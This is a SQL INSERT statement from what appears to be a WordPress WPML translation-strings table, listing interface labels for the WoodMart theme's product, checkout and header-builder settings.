INSERT INTO `wp_icl_strings` (`id`, `language`, `context`, `name`, `value`, `string_package_id`, `location`, `wrap_tag`, `type`, `title`, `status`, `gettext_context`, `domain_name_context_md5`, `translation_priority`, `word_count`) VALUES
(3573, 'en', 'woodmart', '5fd23505a3bfc4d4423803a710c455c3', 'Add to compare button', NULL, NULL, '', 'LINE', NULL, 0, '', '62b429e4307aa21f06a730f2e14fc28f', 'optional', NULL),
(3574, 'en', 'woodmart', '97b0dbbd6591ebec94a9bd1fae3a117c', 'Add this product to compare', NULL, NULL, '', 'LINE', NULL, 0, '', 'd4e3280240d9ff10bdc97498c9d9305e', 'optional', NULL),
(3575, 'en', 'woodmart', '296d876143158999bff78736c851ccf9', 'Icon with text', NULL, NULL, '', 'LINE', NULL, 0, '', '7d5d24ed12d1a1329bb9b65ad7d84561', 'optional', NULL),
(3576, 'en', 'woodmart', 'cb392954a8f33882ee296832ba6dc55e', 'Icon only', NULL, NULL, '', 'LINE', NULL, 0, '', 'f080a94f15dc56a73c77c592b2f6b156', 'optional', NULL),
(3577, 'en', 'woodmart', '290b7c47045d269e2ccfa69e6477acfe', 'Product price', NULL, NULL, '', 'LINE', NULL, 0, '', 'c73e0cc3a56896b9f3ae82f2dfada141', 'optional', NULL),
(3578, 'en', 'woodmart', 'f2e5e51244e6cb7da4efb0765a59d129', 'Regular and sale price', NULL, NULL, '', 'LINE', NULL, 0, '', '192dd1380df54ff48190acce64b934d4', 'optional', NULL),
(3579, 'en', 'woodmart', '4d8adffdc001189e0202c01ac529a3a9', 'Regular price', NULL, NULL, '', 'LINE', NULL, 0, '', 'a482ba527da2333c6b3fe513451b0123', 'optional', NULL),
(3580, 'en', 'woodmart', '6bf4d60c1c87f2f9175e29ad60f3ff42', 'Old price', NULL, NULL, '', 'LINE', NULL, 0, '', 'c7306e9c7a9b4231c8afe4f3e556dc5c', 'optional', NULL),
(3581, 'en', 'woodmart', '56e6ddd1cb6cec596b433440dfb21c17', 'Suffix', NULL, NULL, '', 'LINE', NULL, 0, '', '63a6e3205f45899d7b24442f17d47ea6', 'optional', NULL),
(3582, 'en', 'woodmart', 'efbb4222c361b89091a5a6833dc6f975', 'Product additional information table', NULL, NULL, '', 'LINE', NULL, 0, '', '82f7f77e68e8b1a0265c413382f33516', 'optional', NULL),
(3583, 'en', 'woodmart', 'd46f5f4a874316ff06b1b3e01e05e064', 'Attributes, dimensions, and weight', NULL, NULL, '', 'LINE', NULL, 0, '', '0e63a4080c42baa52f63525c12b23c9a', 'optional', NULL),
(3584, 'en', 'woodmart', '1ab4e5c800bf30cd93d89bf0c20c4f65', 'Product meta value', NULL, NULL, '', 'LINE', NULL, 0, '', '192ae70281ba4b6c6807a826a625fe90', 'optional', NULL),
(3585, 'en', 'woodmart', 'd038d57c138765b493d7f468b4ebb8c3', 'Custom meta value by key', NULL, NULL, '', 'LINE', NULL, 0, '', 'bb40fbce931ac59260c49374615d53cc', 'optional', NULL),
(3586, 'en', 'woodmart', '4a00a080ea358c171f567b59ff23c86b', 'Specify your custom meta key.', NULL, NULL, '', 'LINE', NULL, 0, '', 'e8f548747609c8cda277721db9ac5aa4', 'optional', NULL),
(3587, 'en', 'woodmart', 'e6080036ae954c1e2ac4edd0bfc44c48', 'Add to cart form and button', NULL, NULL, '', 'LINE', NULL, 0, '', '5ae3ee43657035a5bc3b72c98e093473', 'optional', NULL),
(3588, 'en', 'woodmart', 'a7202b779d035d05618881479131a848', 'Variable product', NULL, NULL, '', 'LINE', NULL, 0, '', 'f2717d989ba5b277672f626f18203c0d', 'optional', NULL),
(3589, 'en', 'woodmart', '17c1708788a5a345e70df5017476096b', 'Swatches layout', NULL, NULL, '', 'LINE', NULL, 0, '', '23d6ab51c82981aefef76fb1a61c110e', 'optional', NULL),
(3590, 'en', 'woodmart', 'fdac27920416c6f413fe8d4bacf3c741', 'Clear button position', NULL, NULL, '', 'LINE', NULL, 0, '', '483b18bd4d3a73f1a42f387312cd26cd', 'optional', NULL),
(3591, 'en', 'woodmart', 'c142a73b77f3c3df40777af2651f4915', 'Side', NULL, NULL, '', 'LINE', NULL, 0, '', '88aa93c62a619bca1a5063519d4c03b9', 'optional', NULL),
(3592, 'en', 'woodmart', '9caef5bb9117834debe485827731e78e', 'Swatch label position', NULL, NULL, '', 'LINE', NULL, 0, '', 'a9addc0d82aa96a517b027aaa1b20e3b', 'optional', NULL),
(3593, 'en', 'woodmart', '021e5284374bc0d796da0ce7a2e50377', 'Product short description', NULL, NULL, '', 'LINE', NULL, 0, '', '067ada60f247d8f42ccba754c95fa969', 'optional', NULL),
(3594, 'en', 'woodmart', 'b57753fd7fc3e13b66deff39cfe47322', 'Short description content', NULL, NULL, '', 'LINE', NULL, 0, '', 'e562378548f7c0fd54aba574175b0ed2', 'optional', NULL),
(3595, 'en', 'woodmart', '0570537c21ea4349494d3484af6845a4', 'Product reviews', NULL, NULL, '', 'LINE', NULL, 0, '', 'bf1da28b258feef71b7f6411be1722ee', 'optional', NULL),
(3596, 'en', 'woodmart', 'a6be288605b316e97081af2b84d3aa49', 'Reviews and review form', NULL, NULL, '', 'LINE', NULL, 0, '', 'e8aa1faf67241b5487091f464bb1a097', 'optional', NULL),
(3597, 'en', 'woodmart', '27dc0f4b17f98a54e8b6a325dad04ffd', 'Product rating', NULL, NULL, '', 'LINE', NULL, 0, '', 'd869ce601034ca6f30af4f32986f838b', 'optional', NULL),
(3598, 'en', 'woodmart', 'f9bd588d29c5012f533321d88e0b0270', 'Star rating and reviews number', NULL, NULL, '', 'LINE', NULL, 0, '', '5f5109176a557918f10b6c7d9c9147d4', 'optional', NULL),
(3599, 'en', 'woodmart', 'a7856e071adc59c68dcd05edbd6c5b9d', 'Add to wishlist button', NULL, NULL, '', 'LINE', NULL, 0, '', 'a9a9c23a11fb96fbfdfb0693f6fe8e6d', 'optional', NULL),
(3600, 'en', 'woodmart', '4bdc6ad00a87275c9453b1ddb75033aa', 'Add the product to wishlist', NULL, NULL, '', 'LINE', NULL, 0, '', '7ca2de9e891b04ea8da01393c4c731a1', 'optional', NULL),
(3601, 'en', 'woodmart', '66e332ab3a2013d07e5cb01ed7277d04', 'Product brand information', NULL, NULL, '', 'LINE', NULL, 0, '', '40253ca3ce3d5bc449fc886c42f0e05c', 'optional', NULL),
(3602, 'en', 'woodmart', '082a2b60d6cd87984de928e2f91373d5', 'Brand description content', NULL, NULL, '', 'LINE', NULL, 0, '', '284afe87f5a6075a0cb5a8813323fcbb', 'optional', NULL),
(3603, 'en', 'woodmart', '9686568cd55c0f7311c20e0a941748ff', 'Size guide button', NULL, NULL, '', 'LINE', NULL, 0, '', '34867ebc5fdaea3e9c0284181edff24d', 'optional', NULL),
(3604, 'en', 'woodmart', 'e7bf8a44e1c022e5713a2e540aea1ee6', 'Size guide popup button', NULL, NULL, '', 'LINE', NULL, 0, '', 'fb328b65077c1e2a6bfe1bed7bfb656d', 'optional', NULL),
(3605, 'en', 'woodmart', '4684f90e17d9d618d8cf8d0223db9196', 'Product visitor counter', NULL, NULL, '', 'LINE', NULL, 0, '', '441fd0062406039390ef93850b40e96b', 'optional', NULL),
(3606, 'en', 'woodmart', '7edc21d02541b1bcf27c0a62e7161db9', 'Show number of visitors for the product', NULL, NULL, '', 'LINE', NULL, 0, '', '376409a6c861e4ed14abc7fdd31f44bf', 'optional', NULL),
(3607, 'en', 'woodmart', '3e269eaedc16ab21a5e1c886117c7b40', '[XTemos] WooCommerce', NULL, NULL, '', 'LINE', NULL, 0, '', 'b13b33bade193d154a3b45c0df191b52', 'optional', NULL),
(3608, 'en', 'woodmart', 'd26e8777e30f7da107bc9395e6f73f79', '[XTemos] Single product', NULL, NULL, '', 'LINE', NULL, 0, '', '8b2be6bdf6444554e9992054845d29d2', 'optional', NULL),
(3609, 'en', 'woodmart', 'df2db9a2636243af9e775eaa80d772e7', '[XTemos] Products archive', NULL, NULL, '', 'LINE', NULL, 0, '', '56e57a11dc7f1c2a7bbfe51adae125c5', 'optional', NULL),
(3610, 'en', 'woodmart', 'cd385cb5be849ea3ffe92149054117df', '[XTemos] Cart', NULL, NULL, '', 'LINE', NULL, 0, '', '7cddd0763d004f328c2dd0096b5a6c37', 'optional', NULL),
(3611, 'en', 'woodmart', 'bf9c3abcbf846e767d032d9850f9523b', '[XTemos] Checkout', NULL, NULL, '', 'LINE', NULL, 0, '', '732ca3a81df9ca8960d79757796b2c86', 'optional', NULL),
(3612, 'en', 'woodmart', 'eb15eefbc4980f25dadeead858843889', 'Checkout form', NULL, NULL, '', 'LINE', NULL, 0, '', '2d38b25479292de9f2323a28e39c799e', 'optional', NULL),
(3613, 'en', 'woodmart', '5936f4aeaf0fc417dade6b1af421de22', 'Checkout top content', NULL, NULL, '', 'LINE', NULL, 0, '', 'a7cf8eba77685c28bc0f6707a7cc3434', 'optional', NULL),
(3614, 'en', 'woodmart', '6ca8f3681c7dcb136f867847c0b9369a', 'Layout conditions', NULL, NULL, '', 'LINE', NULL, 0, '', 'ddc58a280e6c7832fb4feea03eddbb48', 'optional', NULL),
(3615, 'en', 'elementor', 'a1fa27779242b4902f7ae3bdd5c6d508', 'Type', NULL, NULL, '', 'LINE', NULL, 0, '', 'dafad92a5793eb6650a44e3c413c206b', 'optional', NULL),
(3616, 'en', 'elementor', '229eb04083e06f419f9ac494329f957d', 'Conditions', NULL, NULL, '', 'LINE', NULL, 0, '', '232acb10d7c9715aee296f48d1fb8cfe', 'optional', NULL),
(3617, 'en', 'woodmart', 'd4d0ee9985bf14169e809b164524b0b0', 'Layout type', NULL, NULL, '', 'LINE', NULL, 0, '', 'f3f7703f19abe19f0630e6bb82f7dae8', 'optional', NULL),
(3618, 'en', 'woodmart', '777475dcd2749b94375fe07762d9d76f', 'Select...', NULL, NULL, '', 'LINE', NULL, 0, '', 'de419b93a1159e06b850a7c31909c358', 'optional', NULL),
(3619, 'en', 'woodmart', '1b2330a23b7bc496b6e19721df8efa27', 'Layout name', NULL, NULL, '', 'LINE', NULL, 0, '', 'fa24c44c3dde67d6ea1826bf682a8b19', 'optional', NULL),
(3620, 'en', 'woodmart', '0a235e5399847a126f98b37c0962a667', 'Enter layout name', NULL, NULL, '', 'LINE', NULL, 0, '', '4c0ab100a7ffd9a4d7578a64d037a7d3', 'optional', NULL),
(3621, 'en', 'woodmart', '229eb04083e06f419f9ac494329f957d', 'Conditions', NULL, NULL, '', 'LINE', NULL, 0, '', 'f5e1e8f0a586cc8abc74d8c076020173', 'optional', NULL),
(3622, 'en', 'woodmart', '643202d7ee8cb01d888e058b5341455a', 'Add condition', NULL, NULL, '', 'LINE', NULL, 0, '', 'ee8d66f6bf04e5437ccc40e755ae35de', 'optional', NULL),
(3623, 'en', 'woodmart', 'ca338a155cae2a74276abf6f4e341351', 'Create layout', NULL, NULL, '', 'LINE', NULL, 0, '', '85c7711652cf325c02b4549791d405e0', 'optional', NULL),
(3624, 'en', 'woodmart', '6799eb77cc7733fb01670d35d106807c', 'Edit conditions', NULL, NULL, '', 'LINE', NULL, 0, '', '923bc418499804487c22b65b13f263e2', 'optional', NULL),
(3625, 'en', 'woodmart', '2b328696cfe7ebee06ae98fb775f64d2', 'Layout preview', NULL, NULL, '', 'LINE', NULL, 0, '', '3625adf6026a508aa1979b7fa426b3fe', 'optional', NULL),
(3626, 'en', 'woodmart', 'ede417c06c9d77c17a54a33dc6d85f03', 'Predefined layouts', NULL, NULL, '', 'LINE', NULL, 0, '', 'fdeced0c271c7ef4723741f782de6b43', 'optional', NULL),
(3627, 'en', 'woodmart', 'a8e33f4722a814b21854db907779ba34', 'Condition comparison', NULL, NULL, '', 'LINE', NULL, 0, '', 'ae418b5bf7c1504d4ab22035d8440dca', 'optional', NULL),
(3628, 'en', 'woodmart', '5f581b60eb5a307bbad9b84641afa091', 'Condition type', NULL, NULL, '', 'LINE', NULL, 0, '', '54f502cf030555518bbb5324a7083182', 'optional', NULL),
(3629, 'en', 'woodmart', 'a8f290cc73ef4426d2bd7d08d8c483b8', 'Condition query', NULL, NULL, '', 'LINE', NULL, 0, '', '0210695af8c1db81252c5c484abc784a', 'optional', NULL),
(3630, 'en', 'woodmart', 'e7b72b4fdb449c461e4485f1a60cc126', 'All product archives', NULL, NULL, '', 'LINE', NULL, 0, '', '43b6235bab42a693de3acfe01430f8df', 'optional', NULL),
(3631, 'en', 'woodmart', 'edab5dc77b3c9b3af2dd20484350338a', 'Shop search results', NULL, NULL, '', 'LINE', NULL, 0, '', '998ca51da76a4eba55d20b5d06ed89d5', 'optional', NULL),
(3632, 'en', 'woodmart', '05790be86a584ba5f31550786a4d2980', 'Product tags', NULL, NULL, '', 'LINE', NULL, 0, '', 'd9ee0f18e0605d4df8e602aea4e04dc8', 'optional', NULL),
(3633, 'en', 'woodmart', '5153ab2da1751f6ce9bdeb3fc8457726', 'Product attribute', NULL, NULL, '', 'LINE', NULL, 0, '', '01f3ec559a945aa648449061bcadc945', 'optional', NULL),
(3634, 'en', 'woodmart', '65aead8deefb0665ad6d8e6af068ed9f', 'Product term (category, tag, attribute)', NULL, NULL, '', 'LINE', NULL, 0, '', '19304dd511d26ff7e2eea6ac042cad8e', 'optional', NULL),
(3635, 'en', 'woodmart', 'b6b8f8e9faad2e3cb1b26b23ba1854e1', 'Child product categories', NULL, NULL, '', 'LINE', NULL, 0, '', 'f200f4e7f19c2ce10237be71aeff67f0', 'optional', NULL),
(3636, 'en', 'woodmart', '22a34ce4e9943b4246b3a9bde643d361', 'Filtered by attribute', NULL, NULL, '', 'LINE', NULL, 0, '', '78410a584025e6dfc089978724fb6ff5', 'optional', NULL),
(3637, 'en', 'woodmart', '904d307b23b487ea5d6fa7a32804f3ce', 'Filtered by any attribute', NULL, NULL, '', 'LINE', NULL, 0, '', '044e5e5e691ec4efe7deea212f63dd91', 'optional', NULL),
(3638, 'en', 'woodmart', '40dec546414c1ebdfde8d9858f0938c3', 'All products', NULL, NULL, '', 'LINE', NULL, 0, '', '4d539c9dea33ff6fd5b39ba4cab260a0', 'optional', NULL),
(3639, 'en', 'woodmart', '61699abace0ee5601299d6ec2d63b05c', 'Single product id', NULL, NULL, '', 'LINE', NULL, 0, '', 'dbdd0d1c3c0a369800fc7de939c39b80', 'optional', NULL),
(3640, 'en', 'woodmart', '3625cdf19abd4ec330b3db80a9d03c50', 'Product category', NULL, NULL, '', 'LINE', NULL, 0, '', '64201d884670532a03ce389271285cd0', 'optional', NULL),
(3641, 'en', 'woodmart', '4df42da5bce1d6e861019ab0c29a3498', 'Product tag', NULL, NULL, '', 'LINE', NULL, 0, '', '467be14ba17d9a3a4a3a773d6d83fe4b', 'optional', NULL),
(3642, 'en', 'woodmart', '3d19aea4e2d382e85165bbf71cef1e05', 'Product type', NULL, NULL, '', 'LINE', NULL, 0, '', 'bdefc086f5d3d81060b322eed6436c64', 'optional', NULL),
(3643, 'en', 'woodmart', '62bd94f677b86453617443ac1b5d1a6d', 'Checkout page form', NULL, NULL, '', 'LINE', NULL, 0, '', '58044fe1e3f708666c5cdf1bf0b2feb4', 'optional', NULL),
(3644, 'en', 'woodmart', 'bfba3b738946028b8c2a55335d4ee6ad', 'Checkout page content', NULL, NULL, '', 'LINE', NULL, 0, '', '32e67c9cae12758332e44c20783f09d2', 'optional', NULL),
(3645, 'en', 'woodmart', '6c25a069796395a889a264fb13bd99a0', 'Note: This element have not options', NULL, NULL, '', 'LINE', NULL, 0, '', '8cba7bcaa80bda843cfdceaeeb35ad8d', 'optional', NULL),
(3646, 'en', 'woodmart', 'c16f41bf78e68cb906e740c986331b5d', 'Shipping progress bar', NULL, NULL, '', 'LINE', NULL, 0, '', '85431bbb47c8dee60c7ddbb5229d46e8', 'optional', NULL),
(3647, 'en', 'woodmart', '56d7f2ee6be6402d6e4608eabfbd71d4', 'Show an icon button on mobile devices instead of dropdown.', NULL, NULL, '', 'LINE', NULL, 0, '', '4654cd52541d8998cc5b6831a087ffee', 'optional', NULL),
(3648, 'en', 'woodmart', 'e9e657f0a29990081fd30541066a0bdc', 'If \"NO\" title will be removed.', NULL, NULL, '', 'LINE', NULL, 0, '', '02c58c8b168e016dfed245a512e229aa', 'optional', NULL),
(3649, 'en', 'woodmart', 'b4750ce0268f54332b91b72bd0b1839a', 'Limit the attribute image container width', NULL, NULL, '', 'LINE', NULL, 0, '', '32cd1eb0bd95b442e74f5d7e9f0f9121', 'optional', NULL),
(3650, 'en', 'woodmart', '534b7c706186028f1b4f51344bbca176', 'Icon color', NULL, NULL, '', 'LINE', NULL, 0, '', 'f81bdcbce7dbac1afd846a0baf4ec529', 'optional', NULL),
(3651, 'en', 'woodmart', '725bd8008d20f86e95aae534d877e231', 'Wishlist icon', NULL, NULL, '', 'LINE', NULL, 0, '', 'cf1dd492e240ea4107cae039906cc862', 'optional', NULL),
(3652, 'en', 'woodmart', '7e77b599b5599beb513dcca128d15190', 'You can show the icon only or display \"Wishlist\" text too.', NULL, NULL, '', 'LINE', NULL, 0, '', '8e134ded295b5e0f1b6069f1536e41de', 'optional', NULL),
(3653, 'en', 'woodmart', '71b869fd27de85ffceaf1d088ed04ca2', 'Icon design', NULL, NULL, '', 'LINE', NULL, 0, '', '52c7f8a6e59c31b21663b88629976d56', 'optional', NULL),
(3654, 'en', 'woodmart', '7fb55ed0b7a30342ba6da306428cae04', 'First', NULL, NULL, '', 'LINE', NULL, 0, '', '83bae37f488221c62eb71fe582176cc9', 'optional', NULL),
(3655, 'en', 'woodmart', 'c22cf8376b1893dcfcef0649fe1a7d87', 'Second', NULL, NULL, '', 'LINE', NULL, 0, '', 'a5256c29dd000eb924a3e36a0b1b66ab', 'optional', NULL),
(3656, 'en', 'woodmart', '168909c0b6f1dfbd48f679d47059c1d6', 'Third', NULL, NULL, '', 'LINE', NULL, 0, '', '405c78a52682c722528962f56ef87d77', 'optional', NULL),
(3657, 'en', 'woodmart', '6e599f7a2a9186d391be4537f105be98', 'Fourth', NULL, NULL, '', 'LINE', NULL, 0, '', 'dccc67c9e7e8b0ed73361581283ba696', 'optional', NULL),
(3658, 'en', 'woodmart', 'af1184535e51781e68118c8c9bb47e37', 'Hide product count label', NULL, NULL, '', 'LINE', NULL, 0, '', '793b13968e3e4ec90baf16e3577bea44', 'optional', NULL),
(3659, 'en', 'woodmart', '2e342f9e44356f7b49dc1020b1bcae1f', 'Mark this option if you want to hide product count label.', NULL, NULL, '', 'LINE', NULL, 0, '', 'cef23aa78dcb7fe15cbea05b2bb61162', 'optional', NULL),
(3660, 'en', 'woodmart', '8cc55fdccaa631039d23aa7b4ebf396a', 'Custom icon', NULL, NULL, '', 'LINE', NULL, 0, '', 'e1045b00db953dca2510a37b07716a4a', 'optional', NULL),
(3661, 'en', 'woodmart', 'f30d3acf19711926edf9fdd62cd38389', 'Choose which HTML block to dislay in the header', NULL, NULL, '', 'LINE', NULL, 0, '', '89e9bfd178f2093843a7791c9929f0a9', 'optional', NULL),
(3662, 'en', 'woodmart', 'a4760c18d530205dbf45c5e3f2f1e598', 'WPBakery builder', NULL, NULL, '', 'LINE', NULL, 0, '', '2bcbb8445189e263899fed5234d3cefb', 'optional', NULL),
(3663, 'en', 'woodmart', 'e950c24de392ec8eff16a09c95f8022c', 'Text with icon', NULL, NULL, '', 'LINE', NULL, 0, '', '2e9619d68f8406e2caa9459ec39da8d9', 'optional', NULL),
(3664, 'en', 'woodmart', 'd511f8439ecde36647437fbba67a4394', 'Space', NULL, NULL, '', 'LINE', NULL, 0, '', '55266ddfeb96f7464abc213767cdb95f', 'optional', NULL),
(3665, 'en', 'woodmart', 'ac11dccd08a5b5a812eeb49e401e943d', 'Space width', NULL, NULL, '', 'LINE', NULL, 0, '', 'b90017e727fde5a2c8b5b52a0c26edff', 'optional', NULL),
(3666, 'en', 'woodmart', '530d14e4081d2a12114b815cd4e0178e', 'Determine the space width.', NULL, NULL, '', 'LINE', NULL, 0, '', 'c78506253a3b1f87f827c6433e22cdcd', 'optional', NULL),
(3667, 'en', 'woodmart', '43c6cfa354d5c6ed1e8a112c7d416cce', 'Additional CSS class', NULL, NULL, '', 'LINE', NULL, 0, '', '366386e4eb15f62d75ea1f4bbe29d13e', 'optional', NULL),
(3668, 'en', 'woodmart', '4c1c7d945fcd04d68bd3b3f1d99a55a1', 'Styles', NULL, NULL, '', 'LINE', NULL, 0, '', '2971cf0deb619996ca092f67cc365013', 'optional', NULL),
(3669, 'en', 'woodmart', '6e3af4d939a78477d731eaa698d1fe71', 'Shopping widget', NULL, NULL, '', 'LINE', NULL, 0, '', 'a7dcc9f90142bfabe780588515645281', 'optional', NULL),
(3670, 'en', 'woodmart', '6abf5aa7cb235af67634dbc6dbd255f4', 'Hidden sidebar', NULL, NULL, '', 'LINE', NULL, 0, '', '7265a06abfc0cae3bc865ab2f4de6944', 'optional', NULL),
(3671, 'en', 'woodmart', 'fb287e18c5504a828a4a9d11db82e46b', 'Fifths', NULL, NULL, '', 'LINE', NULL, 0, '', '7805e434c3554013e9c5c8c2a00eb837', 'optional', NULL),
(3672, 'en', 'woodmart', 'ccfb5154a8e3d8bc6fab7d8ef946d382', 'Sixth', NULL, NULL, '', 'LINE', NULL, 0, '', 'b1f6aec1845569850f41d65cda8567ab', 'optional', NULL),
(3673, 'en', 'woodmart', 'd3ab3d5184fe9b1b4428e4ffb797bdca', 'Bag', NULL, NULL, '', 'LINE', NULL, 0, '', 'ce4730858dc4c1ba5546c28376f8c0be', 'optional', NULL),
(3674, 'en', 'woodmart', '2908050e771fb91a3afbb7809972e90c', 'Divider', NULL, NULL, '', 'LINE', NULL, 0, '', '0ff3c37ec37d8e1de6132e8c04e235be', 'optional', NULL),
(3675, 'en', 'woodmart', '62511ba951498fd411216acf699d3ae5', 'Simple vertical line', NULL, NULL, '', 'LINE', NULL, 0, '', '2cd5c0eb80d09bcd3806e71cacd6a45a', 'optional', NULL),
(3676, 'en', 'woodmart', '4f3c701e1cd235c626f1364a7392996e', 'Full height', NULL, NULL, '', 'LINE', NULL, 0, '', '869705d322f923a5dbd0b06509055f9c', 'optional', NULL),
(3677, 'en', 'woodmart', '5cf53a91664bb8b49bccca2eaec54862', 'Mark this option if you want to show this divider line on the full height for this row.', NULL, NULL, '', 'LINE', NULL, 0, '', 'e107ecfbdaf76d11f07b4b9c2bf37507', 'optional', NULL),
(3678, 'en', 'woodmart', '08bd40c7543007ad06e4fce31618f6ec', 'Account', NULL, NULL, '', 'LINE', NULL, 0, '', 'f22d1503ef3b81e53f2f67d127925617', 'optional', NULL),
(3679, 'en', 'woodmart', '22c699e77fc3446d9a0cdefa93a06765', 'Login/register links', NULL, NULL, '', 'LINE', NULL, 0, '', 'b9f1d93a19d54083d09ba9c0c38f6774', 'optional', NULL),
(3680, 'en', 'woodmart', 'b9987a246a537f4fe86f1f2e3d10dbdb', 'Display', NULL, NULL, '', 'LINE', NULL, 0, '', '0eb9a19ebf96737c16e904f4f061a32e', 'optional', NULL),
(3681, 'en', 'woodmart', 'f4424a5b498996dbb326c25f75d6d178', 'Only text', NULL, NULL, '', 'LINE', NULL, 0, '', '5e4de42b6de028722f713c64f556bd52', 'optional', NULL),
(3682, 'en', 'woodmart', '2b792b3ad64ff1d228d65bf57269fe05', 'Show username', NULL, NULL, '', 'LINE', NULL, 0, '', '26d55d920209f2701c735011b9890103', 'optional', NULL),
(3683, 'en', 'woodmart', 'a8c5d79c4c165b56d1bd26e8c4a5c117', 'Display username when user is logged in.', NULL, NULL, '', 'LINE', NULL, 0, '', '73fe633dd2903a092b2d32b04fb492bc', 'optional', NULL),
(3684, 'en', 'woodmart', '278dd82541ba917f53def6d9f3791470', 'Show login form', NULL, NULL, '', 'LINE', NULL, 0, '', 'e49a1846d1440231e2698af7d0e8be6a', 'optional', NULL),
(3685, 'en', 'woodmart', 'ffe4ea7ae43003c1222173d0e9cdaf2d', 'Display login form dropdown on hover when user is not logged in.', NULL, NULL, '', 'LINE', NULL, 0, '', '898f0a580bdcc73291ce9350b3e24e48', 'optional', NULL),
(3686, 'en', 'woodmart', '2fa11f1269ccd9908b9f23f826616dcb', 'Form display', NULL, NULL, '', 'LINE', NULL, 0, '', 'bd17ef20908ac150213a6f6bd4954e6d', 'optional', NULL),
(3687, 'en', 'woodmart', 'decc204e29536ad15dc418fb03b489cd', 'You can write a list of popular requests in Theme Settings -> General -> Search', NULL, NULL, '', 'LINE', NULL, 0, '', '7e19184177d2aa3ca289793678e3a781', 'optional', NULL),
(3688, 'en', 'woodmart', 'b019ade4672c6e8ba98842a5e4636333', 'Search form', NULL, NULL, '', 'LINE', NULL, 0, '', 'c4925658e6c2ed2697e4cec28161cb4b', 'optional', NULL),
(3689, 'en', 'woodmart', '764ff8d94d40c2ecfca7141e7451aa23', 'Full screen', NULL, NULL, '', 'LINE', NULL, 0, '', 'e7fa045571acc9c738439968e448a6a6', 'optional', NULL),
(3690, 'en', 'woodmart', '76254e6001b4a4a3432554377357ca8c', 'Full screen 2', NULL, NULL, '', 'LINE', NULL, 0, '', '7722c4300736b8b49a56994f60aebcd5', 'optional', NULL),
(3691, 'en', 'woodmart', '869af3f8b86d3a8694cb6ca9283866b4', 'Display search icon/form in the header in different views.', NULL, NULL, '', 'LINE', NULL, 0, '', '477f6d050ebca20673a1032f9a207b40', 'optional', NULL),
(3692, 'en', 'woodmart', 'c46c5c1c84ead0d57aeb8be746ae66cb', 'Show product categories dropdown', NULL, NULL, '', 'LINE', NULL, 0, '', '9342142bf494084166c8b99c1ff7b73a', 'optional', NULL),
(3693, 'en', 'woodmart', '7f0d2592add1eafba6ad6f2ce1cabc54', 'Show popular requests', NULL, NULL, '', 'LINE', NULL, 0, '', 'e03577466094bfa2d1afc2ee2a1bd68b', 'optional', NULL),
(3694, 'en', 'woodmart', 'dde2c9d6f7fbf831ff3eb5e3f705ca94', 'Search with AJAX', NULL, NULL, '', 'LINE', NULL, 0, '', 'ac47050e994cb9e6f8fdcd0c2b64eab3', 'optional', NULL),
(3695, 'en', 'woodmart', 'c4cea6e343d5d11a672ee0921808452c', 'Enable instant AJAX search functionality for this form.', NULL, NULL, '', 'LINE', NULL, 0, '', 'c757ae45c2ce18f4036d8ca3eacb4065', 'optional', NULL),
(3696, 'en', 'woodmart', '29622def907c9b796e8728b2a8a3992e', 'AJAX search results count', NULL, NULL, '', 'LINE', NULL, 0, '', 'aa3ec66e8dc75e683b4dca869e3b40d2', 'optional', NULL),
(3697, 'en', 'woodmart', 'd3c21bfb463c5dee4af373736cab9f55', 'Number of products to display in AJAX search results.', NULL, NULL, '', 'LINE', NULL, 0, '', '6f02871922e90f0ff4e7d38a5bb9722b', 'optional', NULL),
(3698, 'en', 'woodmart', '88ef84dbcaae456bb19eb59199499e93', 'All post types', NULL, NULL, '', 'LINE', NULL, 0, '', '256dd1c9c7da4684cd80110ba81f40ef', 'optional', NULL),
(3699, 'en', 'woodmart', 'f78c1fd4aba6f50272e016bf767f0017', 'Search style', NULL, NULL, '', 'LINE', NULL, 0, '', '12fa62dce102711572eb061e519fcaa4', 'optional', NULL),
(3700, 'en', 'woodmart', '581aca62b8444e789a50a5b0f45687bd', 'Form style', NULL, NULL, '', 'LINE', NULL, 0, '', '43561a1834582d6129cd4304dfefb088', 'optional', NULL),
(3701, 'en', 'woodmart', 'e6f78bbd5171fb6b4e2e6ba06c87923b', 'Determine the \"flex layout\" for this row. More information about both options read in our <a href=\"https://xtemos.com/docs/woodmart/header-builder/header-rows-flex-layouts/\" target=\"_blank\">documentation here</a>.', NULL, NULL, '', 'LINE', NULL, 0, '', '83a560e6d098c1f68a1691fb3bde29c9', 'optional', NULL),
(3702, 'en', 'woodmart', 'a70367aa7cb74e510f4f9413ccf059d3', 'Row', NULL, NULL, '', 'LINE', NULL, 0, '', '8901be713eae6a57218bc1e2dd5853c3', 'optional', NULL),
(3703, 'en', 'woodmart', 'e17f15068ed1dba220ba5adc3063130b', 'Row flex layout', NULL, NULL, '', 'LINE', NULL, 0, '', '5f01aec41a44ec6fd5dbb11ede66c226', 'optional', NULL),
(3704, 'en', 'woodmart', 'cdc3ac3bafb7de0af5559130651bed38', 'Flexible middle column', NULL, NULL, '', 'LINE', NULL, 0, '', 'df84b5082ca2376216d4f8fd98eaace5', 'optional', NULL),
(3705, 'en', 'woodmart', '074c9a8c136e9cc617cb94ca996f1ca5', 'Equal right and left columns', NULL, NULL, '', 'LINE', NULL, 0, '', '0580c102fb49c802848b3c6522f8efa1', 'optional', NULL),
(3706, 'en', 'woodmart', '9409ff70f6ebfd63525fc9c6fff96130', 'Row height', NULL, NULL, '', 'LINE', NULL, 0, '', 'd266853eb662c59170ce8cb8edd3e6af', 'optional', NULL),
(3707, 'en', 'woodmart', 'd5f9a81c45f14e7991ca0e484a926cfd', 'Determine the header height value in pixels.', NULL, NULL, '', 'LINE', NULL, 0, '', '2428f6c410cc2d74f82774323ac27b90', 'optional', NULL),
(3708, 'en', 'woodmart', '5f3f7a92512cedc07840aafc63cf00ff', 'Row height on mobile devices', NULL, NULL, '', 'LINE', NULL, 0, '', 'b55cb96d2f8538c7f8e1a5464a02b1a8', 'optional', NULL),
(3709, 'en', 'woodmart', '055df90f010c9dbb68e671589357cc4c', 'Determine the header height for mobile devices value in pixels.', NULL, NULL, '', 'LINE', NULL, 0, '', 'f4cdfefc7ccb9ae0a6bcb1ab5cb230a3', 'optional', NULL),
(3710, 'en', 'woodmart', '9344b5052abfc9e285ec03778604e972', 'Hide on desktop', NULL, NULL, '', 'LINE', NULL, 0, '', 'dc17b928b91c196a9daf7a98c87215d9', 'optional', NULL),
